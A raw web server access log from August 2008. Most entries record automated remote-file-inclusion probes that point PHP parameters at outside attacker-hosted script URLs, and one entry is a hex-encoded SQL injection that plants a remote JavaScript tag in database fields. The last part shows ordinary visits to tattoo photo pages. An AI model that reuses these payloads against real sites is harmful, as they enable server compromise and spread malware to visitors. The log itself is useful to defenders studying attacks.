146.96.128.46 - - [16/Aug/2008:22:38:05 -0500] "GET /logs/bits_listings.php?svr_rootPhpStart=http://www.wichtl.at/files/echo.txt? HTTP/1.1" 404 306 "-""libwww-perl/5.79"
146.96.128.46 - - [16/Aug/2008:22:38:05 -0500] "GET /bits_listings.php?svr_rootPhpStart=http://www.wichtl.at/files/echo.txt? HTTP/1.1" 404 301 "-""libwww-perl/5.79"
62.87.154.41 - - [16/Aug/2008:22:38:24 -0500] "GET /logs//errors/needinit.php?GALLERY_BASEDIR=http://www.gugn.ru/news/data/archives/id2.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.803"
62.87.154.41 - - [16/Aug/2008:22:38:24 -0500] "GET //errors/needinit.php?GALLERY_BASEDIR=http://www.gugn.ru/news/data/archives/id2.txt?? HTTP/1.1" 404 304 "-""libwww-perl/5.803"
212.150.247.23 - - [16/Aug/2008:22:38:36 -0500] "GET /logs//admin/frontpage_right.php?loadadminpage=http://makemoneymania.info/.../rid??? HTTP/1.1" 404 315 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b"
212.150.247.23 - - [16/Aug/2008:22:38:36 -0500] "GET //admin/frontpage_right.php?loadadminpage=http://makemoneymania.info/.../rid??? HTTP/1.1" 404 310 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b"
193.201.218.158 - - [16/Aug/2008:22:38:39 -0500] "GET /logs/access_log.1213401600//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.reinaldo.kit.net/cmdtotal.txt?? HTTP/1.1" 404 355 "-""libwww-perl/5.805"
64.26.63.11 - - [16/Aug/2008:22:39:08 -0500] "GET /logs//errors/needinit.php?GALLERY_BASEDIR=http://www.gugn.ru/news/data/archives/arab.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.803"
64.26.63.11 - - [16/Aug/2008:22:39:08 -0500] "GET //errors/needinit.php?GALLERY_BASEDIR=http://www.gugn.ru/news/data/archives/arab.txt?? HTTP/1.1" 404 304 "-""libwww-perl/5.803"
64.26.63.11 - - [16/Aug/2008:22:39:57 -0500] "GET //errors/needinit.php?GALLERY_BASEDIR=http://www.gugn.ru/news/data/archives/arab.txt?? HTTP/1.1" 404 304 "-""libwww-perl/5.803"
63.249.159.4 - - [16/Aug/2008:22:40:42 -0500] "GET /logs/access_log.1213401600//errors/needinit.php?GALLERY_BASEDIR=http://tokihasanaga.com/files/oye.txt?? HTTP/1.1" 404 331 "-""libwww-perl/5.805"
63.249.159.4 - - [16/Aug/2008:22:40:43 -0500] "GET //errors/needinit.php?GALLERY_BASEDIR=http://tokihasanaga.com/files/oye.txt?? HTTP/1.1" 404 304 "-""libwww-perl/5.805"
63.249.159.4 - - [16/Aug/2008:22:40:43 -0500] "GET /logs//errors/needinit.php?GALLERY_BASEDIR=http://tokihasanaga.com/files/oye.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
69.64.34.172 - - [16/Aug/2008:22:40:52 -0500] "GET /logs/access_log.1206230400/modules/My_eGallery/index.php?basepath=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 340 "-""libwww-perl/5.805"
212.150.247.23 - - [16/Aug/2008:22:41:18 -0500] "GET //admin/frontpage_right.php?loadadminpage=http://makemoneymania.info/.../rid??? HTTP/1.1" 404 310 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
212.150.247.23 - - [16/Aug/2008:22:41:18 -0500] "GET /logs//admin/frontpage_right.php?loadadminpage=http://makemoneymania.info/.../rid??? HTTP/1.1" 404 315 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
69.61.106.55 - - [16/Aug/2008:22:41:39 -0500] "GET /logs/access_log.1202947200/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://fdp.de/vorschaltseite/did.txt? HTTP/1.1" 404 352 "-""libwww-perl/5.812"
69.61.106.55 - - [16/Aug/2008:22:41:39 -0500] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://fdp.de/vorschaltseite/did.txt? HTTP/1.1" 404 325 "-""libwww-perl/5.812"
69.61.106.55 - - [16/Aug/2008:22:41:39 -0500] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://fdp.de/vorschaltseite/did.txt? HTTP/1.1" 404 330 "-""libwww-perl/5.812"
200.155.18.50 - - [16/Aug/2008:22:41:46 -0500] "GET /logs/access_log.1206230400//modules/TotalCalendar/about.php?inc_dir=http://www.shopbijou.com/id.txt??? HTTP/1.1" 404 343 "-""libwww-perl/5.805"
200.155.18.50 - - [16/Aug/2008:22:41:46 -0500] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.shopbijou.com/id.txt??? HTTP/1.1" 404 316 "-""libwww-perl/5.805"
200.155.18.50 - - [16/Aug/2008:22:41:47 -0500] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.shopbijou.com/id.txt??? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
213.33.84.163 - - [16/Aug/2008:22:42:02 -0500] "GET /logs//errors/needinit.php?GALLERY_BASEDIR=http://www.gugn.ru/news/data/archives/arab.txt? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
213.33.84.163 - - [16/Aug/2008:22:42:02 -0500] "GET //errors/needinit.php?GALLERY_BASEDIR=http://www.gugn.ru/news/data/archives/arab.txt? HTTP/1.1" 404 304 "-""libwww-perl/5.805"
64.26.63.11 - - [16/Aug/2008:22:42:41 -0500] "GET /logs/access_log.1213401600//errors/needinit.php?GALLERY_BASEDIR=http://www.gugn.ru/news/data/archives/arab.txt?? HTTP/1.1" 404 331 "-""libwww-perl/5.803"
64.26.63.11 - - [16/Aug/2008:22:42:41 -0500] "GET //errors/needinit.php?GALLERY_BASEDIR=http://www.gugn.ru/news/data/archives/arab.txt?? HTTP/1.1" 404 304 "-""libwww-perl/5.803"
64.26.63.11 - - [16/Aug/2008:22:42:41 -0500] "GET /logs//errors/needinit.php?GALLERY_BASEDIR=http://www.gugn.ru/news/data/archives/arab.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.803"
200.150.189.10 - - [16/Aug/2008:22:43:21 -0500] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://xvascainox7.sites.uol.com.br/v6.txt?%0D?? HTTP/1.1" 404 336 "-""libwww-perl/5.76"
200.150.189.10 - - [16/Aug/2008:22:43:21 -0500] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://xvascainox7.sites.uol.com.br/v6.txt?%0D?? HTTP/1.1" 404 341 "-""libwww-perl/5.76"
200.155.18.50 - - [16/Aug/2008:22:43:49 -0500] "GET /logs/access_log.1201737600%20/index.php?pageurl=http://www.shopbijou.com/id.txt??? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
212.150.247.23 - - [16/Aug/2008:22:44:04 -0500] "GET /logs//admin/frontpage_right.php?loadadminpage=http://makemoneymania.info/.../rid??? HTTP/1.1" 404 315 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
212.150.247.23 - - [16/Aug/2008:22:44:05 -0500] "GET //admin/frontpage_right.php?loadadminpage=http://makemoneymania.info/.../rid??? HTTP/1.1" 404 310 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
67.19.51.194 - - [16/Aug/2008:22:44:07 -0500] "GET /logs/access_log.1213401600//errors/needinit.php?GALLERY_BASEDIR=http://www.gugn.ru/news/data/archives/id2.txt?? HTTP/1.1" 404 331 "-""libwww-perl/5.79"
67.19.51.194 - - [16/Aug/2008:22:44:07 -0500] "GET //errors/needinit.php?GALLERY_BASEDIR=http://www.gugn.ru/news/data/archives/id2.txt?? HTTP/1.1" 404 304 "-""libwww-perl/5.79"
67.19.51.194 - - [16/Aug/2008:22:44:07 -0500] "GET /logs//errors/needinit.php?GALLERY_BASEDIR=http://www.gugn.ru/news/data/archives/id2.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.79"
72.52.143.147 - - [16/Aug/2008:22:45:13 -0500] "GET /logs/bits_listings.php?svr_rootPhpStart=http://www.ordconstruction.com/skins/default_blue/mail/common_templates/index.php/echo? HTTP/1.1" 404 306 "-""libwww-perl/5.811"
72.52.143.147 - - [16/Aug/2008:22:45:13 -0500] "GET /bits_listings.php?svr_rootPhpStart=http://www.ordconstruction.com/skins/default_blue/mail/common_templates/index.php/echo? HTTP/1.1" 404 301 "-""libwww-perl/5.811"
216.139.67.90 - - [16/Aug/2008:22:45:17 -0500] "GET /logs/access_log.1213401600//errors/needinit.php?GALLERY_BASEDIR=http://www.gugn.ru/news/data/archives/arab.txt? HTTP/1.1" 404 331 "-""libwww-perl/5.64"
216.139.67.90 - - [16/Aug/2008:22:45:17 -0500] "GET //errors/needinit.php?GALLERY_BASEDIR=http://www.gugn.ru/news/data/archives/arab.txt? HTTP/1.1" 404 304 "-""libwww-perl/5.64"
216.139.67.90 - - [16/Aug/2008:22:45:17 -0500] "GET /logs//errors/needinit.php?GALLERY_BASEDIR=http://www.gugn.ru/news/data/archives/arab.txt? HTTP/1.1" 404 309 "-""libwww-perl/5.64"
200.150.189.10 - - [16/Aug/2008:22:45:45 -0500] "GET //include.php?path[docroot]=http://xvascainox7.sites.uol.com.br/v6.txt?%0D?? HTTP/1.1" 404 296 "-""libwww-perl/5.76"
200.150.189.10 - - [16/Aug/2008:22:45:45 -0500] "GET /logs/access_log.1206230400//include.php?path[docroot]=http://xvascainox7.sites.uol.com.br/v6.txt?%0D?? HTTP/1.1" 404 323 "-""libwww-perl/5.76"
200.150.189.10 - - [16/Aug/2008:22:45:45 -0500] "GET /logs//include.php?path[docroot]=http://xvascainox7.sites.uol.com.br/v6.txt?%0D?? HTTP/1.1" 404 301 "-""libwww-perl/5.76"
62.109.176.109 - - [16/Aug/2008:22:45:54 -0500] "GET /logs/access_log.1214524800//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
141.89.66.2 - - [16/Aug/2008:22:46:10 -0500] "GET /logs/lostpasswd.php?env[include_prefix]=http://seandempsey.com/temp/response.txt???? HTTP/1.1" 404 303 "-""libwww-perl/5.805"
141.89.66.2 - - [16/Aug/2008:22:46:10 -0500] "GET /lostpasswd.php?env[include_prefix]=http://seandempsey.com/temp/response.txt???? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
212.150.247.23 - - [16/Aug/2008:22:46:20 -0500] "GET //admin/frontpage_right.php?loadadminpage=http://makemoneymania.info/.../rid??? HTTP/1.1" 404 310 "-""Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
212.150.247.23 - - [16/Aug/2008:22:46:40 -0500] "GET /logs//admin/frontpage_right.php?loadadminpage=http://makemoneymania.info/.../rid??? HTTP/1.1" 404 315 "-""Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
64.105.33.158 - - [16/Aug/2008:22:47:17 -0500] "GET /logs/access_log.1208044800/errors.php?error=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
64.105.33.158 - - [16/Aug/2008:22:47:23 -0500] "GET /errors.php?error=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
64.105.33.158 - - [16/Aug/2008:22:47:32 -0500] "GET /logs/errors.php?error=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
64.105.33.158 - - [16/Aug/2008:22:47:36 -0500] "GET /logs/access_log.1206230400/errors.php?error=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
200.155.18.50 - - [16/Aug/2008:22:47:54 -0500] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.shopbijou.com/id.txt??? HTTP/1.1" 404 338 "-""libwww-perl/5.805"
200.155.18.50 - - [16/Aug/2008:22:47:55 -0500] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.shopbijou.com/id.txt??? HTTP/1.1" 404 333 "-""libwww-perl/5.805"
201.36.3.152 - - [16/Aug/2008:22:47:57 -0500] "GET /logs/access_log.1213401600?;DeCLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777332E3830306D672E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272720776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777332E3830306D672E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));ExEC(@S); HTTP/1.1" 200 52233 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
201.12.151.24 - - [16/Aug/2008:22:48:40 -0500] "GET /logs//include.php?path[docroot]=http://xvascainox7.sites.uol.com.br/id.txt?%0D?? HTTP/1.1" 404 301 "-""libwww-perl/5.800"
201.12.151.24 - - [16/Aug/2008:22:48:40 -0500] "GET /logs/access_log.1206230400//include.php?path[docroot]=http://xvascainox7.sites.uol.com.br/id.txt?%0D?? HTTP/1.1" 404 323 "-""libwww-perl/5.800"
201.12.151.24 - - [16/Aug/2008:22:48:40 -0500] "GET //include.php?path[docroot]=http://xvascainox7.sites.uol.com.br/id.txt?%0D?? HTTP/1.1" 404 296 "-""libwww-perl/5.800"
69.73.189.205 - - [16/Aug/2008:22:48:47 -0500] "GET /logs//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.desperate-souls.com/templates/portax/images/media/idsea.txt??? HTTP/1.1" 404 343 "-""libwww-perl/5.805"
69.73.189.205 - - [16/Aug/2008:22:48:47 -0500] "GET /logs//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.desperate-souls.com/templates/portax/images/media/idsea.txt??? HTTP/1.1" 404 343 "-""libwww-perl/5.805"
69.73.189.205 - - [16/Aug/2008:22:48:47 -0500] "GET //modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.desperate-souls.com/templates/portax/images/media/idsea.txt??? HTTP/1.1" 404 338 "-""libwww-perl/5.805"
69.73.189.205 - - [16/Aug/2008:22:48:48 -0500] "GET //modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.desperate-souls.com/templates/portax/images/media/idsea.txt??? HTTP/1.1" 404 338 "-""libwww-perl/5.805"
213.33.84.163 - - [16/Aug/2008:22:48:50 -0500] "GET /logs/access_log.1213401600//errors/needinit.php?GALLERY_BASEDIR=http://www.gugn.ru/news/data/archives/arab.txt? HTTP/1.1" 404 331 "-""libwww-perl/5.805"
213.33.84.163 - - [16/Aug/2008:22:48:51 -0500] "GET //errors/needinit.php?GALLERY_BASEDIR=http://www.gugn.ru/news/data/archives/arab.txt? HTTP/1.1" 404 304 "-""libwww-perl/5.805"
213.33.84.163 - - [16/Aug/2008:22:48:51 -0500] "GET /logs//errors/needinit.php?GALLERY_BASEDIR=http://www.gugn.ru/news/data/archives/arab.txt? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
65.55.208.122 - - [16/Aug/2008:22:49:12 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.122 - - [16/Aug/2008:22:49:12 -0500] "GET /logs/access_log.1215561600 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
212.150.247.23 - - [16/Aug/2008:22:49:26 -0500] "GET //admin/frontpage_right.php?loadadminpage=http://makemoneymania.info/.../rid??? HTTP/1.1" 404 310 "-""Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)"
212.150.247.23 - - [16/Aug/2008:22:49:26 -0500] "GET /logs//admin/frontpage_right.php?loadadminpage=http://makemoneymania.info/.../rid??? HTTP/1.1" 404 315 "-""Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)"
74.6.22.107 - - [16/Aug/2008:22:50:13 -0500] "GET /logs/access_log.1186704000 HTTP/1.0" 200 149605 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
211.202.2.32 - - [16/Aug/2008:22:50:25 -0500] "GET //include.php?path[docroot]=http://www.ds5vxk.com/board/id.txt?? HTTP/1.1" 404 296 "-""libwww-perl/5.79"
67.19.173.36 - - [16/Aug/2008:22:50:42 -0500] "GET /logs/access_log.1202947200/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://fdp.de/vorschaltseite/did.txt? HTTP/1.1" 404 352 "-""libwww-perl/5.65"
67.19.173.36 - - [16/Aug/2008:22:50:42 -0500] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://fdp.de/vorschaltseite/did.txt? HTTP/1.1" 404 325 "-""libwww-perl/5.65"
67.19.173.36 - - [16/Aug/2008:22:50:42 -0500] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://fdp.de/vorschaltseite/did.txt? HTTP/1.1" 404 330 "-""libwww-perl/5.65"
201.12.151.24 - - [16/Aug/2008:22:51:19 -0500] "GET //include.php?path[docroot]=http://xvascainox7.sites.uol.com.br/id.txt?%0D?? HTTP/1.1" 404 296 "-""libwww-perl/5.800"
200.150.189.10 - - [16/Aug/2008:22:51:25 -0500] "GET //include.php?path[docroot]=http://xvascainox7.sites.uol.com.br/v6.txt?%0D?? HTTP/1.1" 404 296 "-""libwww-perl/5.76"
205.234.193.162 - - [16/Aug/2008:22:53:47 -0500] "GET /logs//poll/comments.php?id=%7B$%7Binclude($ddd)%7D%http://vncx.t35.com/scan/id44.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.810"
205.234.193.162 - - [16/Aug/2008:22:53:47 -0500] "GET //poll/comments.php?id=%7B$%7Binclude($ddd)%7D%http://vncx.t35.com/scan/id44.txt?? HTTP/1.1" 404 302 "-""libwww-perl/5.810"
62.109.176.109 - - [16/Aug/2008:22:54:51 -0500] "GET /logs/access_log.1214524800//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
62.109.176.109 - - [16/Aug/2008:22:54:55 -0500] "GET //index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
62.109.176.109 - - [16/Aug/2008:22:54:59 -0500] "GET /logs//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
69.94.30.30 - - [16/Aug/2008:22:54:59 -0500] "GET /logs/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://yohap.com/links/id??%0D?? HTTP/1.1" 404 329 "-""libwww-perl/5.805"
69.94.30.30 - - [16/Aug/2008:22:54:59 -0500] "GET /components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://yohap.com/links/id??%0D?? HTTP/1.1" 404 324 "-""libwww-perl/5.805"
69.64.34.172 - - [16/Aug/2008:22:56:02 -0500] "GET /logs/access_log.1214438400//bemarket/postscript/postscript.php?p_mode=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 346 "-""libwww-perl/5.805"
69.64.34.172 - - [16/Aug/2008:22:56:02 -0500] "GET //bemarket/postscript/postscript.php?p_mode=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 319 "-""libwww-perl/5.805"
69.64.34.172 - - [16/Aug/2008:22:56:02 -0500] "GET /logs//bemarket/postscript/postscript.php?p_mode=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 324 "-""libwww-perl/5.805"
193.201.218.158 - - [16/Aug/2008:22:57:49 -0500] "GET /logs/access_log.1214524800//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.reinaldo.kit.net/cmdtotal.txt?? HTTP/1.1" 404 355 "-""libwww-perl/5.805"
122.108.234.16 - - [16/Aug/2008:22:59:15 -0500] "GET /tattoo/set2.htm HTTP/1.1" 200 2378 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
122.108.234.16 - - [16/Aug/2008:22:59:16 -0500] "GET /tattoo/tatb1.JPG HTTP/1.1" 200 14848 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
122.108.234.16 - - [16/Aug/2008:22:59:16 -0500] "GET /tattoo/tatb10.JPG HTTP/1.1" 200 17887 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
122.108.234.16 - - [16/Aug/2008:22:59:16 -0500] "GET /tattoo/tatb2.JPG HTTP/1.1" 200 16592 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
122.108.234.16 - - [16/Aug/2008:22:59:17 -0500] "GET /tattoo/tatb3.JPG HTTP/1.1" 200 16163 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
122.108.234.16 - - [16/Aug/2008:22:59:17 -0500] "GET /tattoo/tatb4.JPG HTTP/1.1" 200 15705 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
122.108.234.16 - - [16/Aug/2008:22:59:17 -0500] "GET /tattoo/tatb5.JPG HTTP/1.1" 200 20135 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
122.108.234.16 - - [16/Aug/2008:22:59:18 -0500] "GET /tattoo/tatb6.JPG HTTP/1.1" 200 21190 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
122.108.234.16 - - [16/Aug/2008:22:59:18 -0500] "GET /tattoo/tatb7.JPG HTTP/1.1" 200 16193 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
122.108.234.16 - - [16/Aug/2008:22:59:18 -0500] "GET /tattoo/tatb8.JPG HTTP/1.1" 200 18467 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
122.108.234.16 - - [16/Aug/2008:22:59:18 -0500] "GET /tattoo/tatb9.JPG HTTP/1.1" 200 21598 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
122.108.234.16 - - [16/Aug/2008:23:00:18 -0500] "GET /tattoo/set3.htm HTTP/1.1" 200 2177 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
122.108.234.16 - - [16/Aug/2008:23:00:18 -0500] "GET /tattoo/tatc1.JPG HTTP/1.1" 200 21412 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
122.108.234.16 - - [16/Aug/2008:23:00:18 -0500] "GET /tattoo/tatc10.JPG HTTP/1.1" 200 14157 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
122.108.234.16 - - [16/Aug/2008:23:00:19 -0500] "GET /tattoo/tatc2.JPG HTTP/1.1" 200 17893 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
122.108.234.16 - - [16/Aug/2008:23:00:20 -0500] "GET /tattoo/tatc3.JPG HTTP/1.1" 200 16313 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
122.108.234.16 - - [16/Aug/2008:23:00:20 -0500] "GET /tattoo/tatc4.JPG HTTP/1.1" 200 12619 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
122.108.234.16 - - [16/Aug/2008:23:00:20 -0500] "GET /tattoo/tatc8.JPG HTTP/1.1" 200 17057 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
122.108.234.16 - - [16/Aug/2008:23:00:20 -0500] "GET /tattoo/tatc6.JPG HTTP/1.1" 200 14549 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
122.108.234.16 - - [16/Aug/2008:23:00:20 -0500] "GET /tattoo/tatc7.JPG HTTP/1.1" 200 12347 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
122.108.234.16 - - [16/Aug/2008:23:00:20 -0500] "GET /tattoo/tatc9.JPG HTTP/1.1" 200 18139 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
122.108.234.16 - - [16/Aug/2008:23:00:21 -0500] "GET /tattoo/tatc5.JPG HTTP/1.1" 200 19436 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
122.108.234.16 - - [16/Aug/2008:23:00:49 -0500] "GET /tattoo/set4.htm HTTP/1.1" 200 1762 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
122.108.234.16 - - [16/Aug/2008:23:00:49 -0500] "GET /tattoo/tatd1.JPG HTTP/1.1" 200 14507 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
122.108.234.16 - - [16/Aug/2008:23:00:50 -0500] "GET /tattoo/tatd2.JPG HTTP/1.1" 200 14891 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
122.108.234.16 - - [16/Aug/2008:23:00:50 -0500] "GET /tattoo/tatd3.JPG HTTP/1.1" 200 12386 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
